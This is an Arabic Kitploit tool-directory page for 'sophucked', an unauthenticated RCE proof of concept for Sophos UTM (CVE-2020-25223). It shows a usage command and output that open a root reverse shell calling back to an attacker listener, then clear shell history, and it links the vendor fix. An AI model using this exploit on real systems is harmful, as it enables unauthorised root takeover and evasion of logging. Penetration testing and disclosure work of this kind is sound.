Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
sophucked — CVE-2020-25223 | Kitploit
أدوات/GitHubGitHub/darrenmartyn/sophucked
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالفريق الأحمرأداة الوصول عن بعد
GitHubdarrenmartyn/sophucked

sophucked

CVE-2020-25223

عرض المستودع
111منذ 4 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

sophucked

CVE-2020-25223 RCE PoC، يحصل على شيل عكسي. بدون مصادقة. تم تنفيذه بسرعة لأنه كان مطلوبًا لتوحيد بعض مغناطيس التهديدات.

مثال الاستخدام:

root@kitploit:~
# python sophucked.py https://x.x.x.x:4443 x.x.x.x 80
(+) starting handler on port 80
(+) Sending callback to x.x.x.x:80
(+) connection from x.x.x.x
(+) pop thy shell!
bash: no job control in this shell
utm:/var/confd # unset HISTFILE
unset HISTFILE
utm:/var/confd # id
id
uid=0(root) gid=0(root) groups=0(root)
utm:/var/confd # exit
exit
exit
*** Connection closed by remote host ***
# 

الفحص/الكشف

غير مطبق هنا، فقط استخدم قالب nuclei.

ملاحظات ما بعد الاستغلال

تحتوي هذه الأجهزة على مترجم بايثون، وبيئة لينكس كاملة الميزات بالفعل. إمكانيات رائعة لمرحلة ما بعد الاستغلال.

ملاحظات الفريق الأزرق

أنا متأكد من أن شخصًا يهتم بالأمر يمكنه ملء هذا. Bitter (مجموعة فرعية من "تويتر الفريق الأزرق") سيفعل ذلك على الأرجح قريبًا. أعني، لا يمكن أن يكون من الصعب جدًا اكتشاف شيل عكسي غير مشفر يرسل إشارات من صندوق مدير التهديدات الموحد الخاص بك، أليس كذلك؟

إصلاح الثغرة

شخص (من المفترض من Sophos) أرسل هذا، هو رابط الإصلاح الرسمي. قم بتحديث UTM الخاص بك. https://www.sophos.com/en-us/security-advisories/sophos-sa-20200918-sg-webadmin-rce

المراجع، إلخ.

مرجع طرف ثالث (تفاصيل الثغرة): https://www.atredis.com/blog/2021/8/18/sophos-utm-cve-2020-25223

الشكاوى المباشرة إلى Sophos، الذين اعتقدوا بطريقة ما أن تمرير إدخال المستخدم إلى open() في Perl كان فكرة جيدة في القرن الحادي والعشرين.

تنزيل الأداة